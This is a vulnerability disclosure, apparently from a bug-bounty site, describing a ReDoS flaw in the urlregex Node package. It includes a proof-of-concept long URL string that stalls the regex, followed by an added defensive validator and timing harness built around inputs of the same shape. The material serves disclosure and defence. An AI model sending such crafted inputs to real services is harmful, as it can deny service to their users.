Denial of Service in nescalante/urlregex
Valid
Reported on Jun 24th 2020
Overview
urlregex: No-dependency URL validation for Node and the browser. This package is vulnerable to Regular Expression Denial of Service (ReDoS). An attacker providing a long string in String.test can cause a Denial of Service attack.
PoC
const urlRegex = require("urlregex");
const isValid = urlRegex().test(
"http://huntr.devtestvulnerability2312321.testvulnerability2312321.testvulnerability2312321.testvulnerability2312321.testvulnerability2312321.testvulnerability2312321.testvulnerability2312321"
);
console.log(isValid);
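A defensive alternative, as an added example that is not part of the original report or urlregex's own code: it caps input length and uses the built-in WHATWG URL parser instead of a backtracking regex, then times the validator on constructed inputs shaped like the PoC above. The names MAX_URL_LENGTH, isValidUrl, repeatedLabelUrl and timeValidator are hypothetical, and the 2048-character cap is an assumption.

```javascript
// Added example (not urlregex's code): validate URLs without a backtracking regex.
// Assumption: a 2048-character cap is acceptable for the application.
const MAX_URL_LENGTH = 2048;
const ALLOWED_PROTOCOLS = new Set(["http:", "https:"]);

// Length is checked first, so oversized input is rejected before any parsing.
// The WHATWG URL parser (global in Node and browsers) is a state machine,
// not a regex, so there are no nested quantifiers to backtrack over.
function isValidUrl(input) {
  if (typeof input !== "string") return false;
  if (input.length === 0 || input.length > MAX_URL_LENGTH) return false;
  let parsed;
  try {
    parsed = new URL(input);
  } catch (err) {
    return false; // not parseable as an absolute URL
  }
  return ALLOWED_PROTOCOLS.has(parsed.protocol) && parsed.hostname !== "";
}

// Constructed input with the same shape as the report's PoC: a host built
// from `labels` copies of one label, joined by dots.
function repeatedLabelUrl(labels) {
  return "http://huntr.dev" + Array(labels).fill("testvulnerability2312321").join(".");
}

// Regression check: time a validator on inputs of growing size. A validator
// whose time multiplies at each step is backtracking; a safe one stays flat.
function timeValidator(validator, sizes) {
  return sizes.map((labels) => {
    const input = repeatedLabelUrl(labels);
    const start = performance.now();
    const result = validator(input);
    return { labels, length: input.length, result, ms: performance.now() - start };
  });
}

console.table(timeValidator(isValidUrl, [7, 14, 28, 56]));
```

Passing a different validator to timeValidator in a test suite shows whether its running time grows sharply as the input doubles.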